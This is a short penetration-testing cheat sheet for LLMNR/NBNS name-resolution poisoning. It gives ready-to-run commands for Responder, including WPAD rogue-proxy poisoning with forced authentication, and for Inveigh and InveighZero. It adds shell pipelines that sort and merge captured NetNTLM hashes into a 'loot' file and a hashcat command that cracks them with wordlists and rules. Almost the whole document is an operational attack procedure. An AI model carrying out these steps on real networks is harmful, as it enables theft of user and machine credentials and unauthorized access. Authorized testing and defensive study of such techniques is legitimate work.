LLMNR / NBNS Poisoning

Link-Local Multicast Name Resolution / NetBIOS Name Service

Responder

Install:

$ git clone https://github.com/lgandx/Responder ~/tools/Responder && cd ~/tools/Responder

Run:

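# Analyze mode (-A): watch name-resolution requests without answering them
$ sudo ./Responder.py -I eth0 -Av
# Poisoning mode with the WPAD rogue proxy (-w) and forced proxy authentication (-P)
$ sudo ./Responder.py -I eth0 -wd -P -v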

Parse, sort and save hashes:

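# Users: drop machine accounts (names containing '$'), keep one hash per user name
$ cat logs/*.txt | grep -a . | grep -a -v -e 'logs/' -e '\$' | sort -u -t: -k1,1 > net-ntlmv2.responder
# Merge into the loot file, still one hash per user name
$ sort -u -t: -k1,1 net-ntlmv2.responder ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.responder

# Machines: accounts whose name contains '$', one hash per account
$ cat logs/*.txt | grep -a '\$' | sort -u -t: -k1,1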

Monitor new hashes:

$ sudo inotifywait -rm /usr/share/responder/logs | grep NTLMv1

Crack:

$ hashcat -m 5600 -O -a 0 -w 3 --session=netntlmv2 -o net-ntlmv2.out net-ntlmv2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

Inveigh

PS > Invoke-Inveigh [-IP '10.10.13.37'] -ConsoleOutput Y -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y

InveighZero

PS > .\InveighZero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]
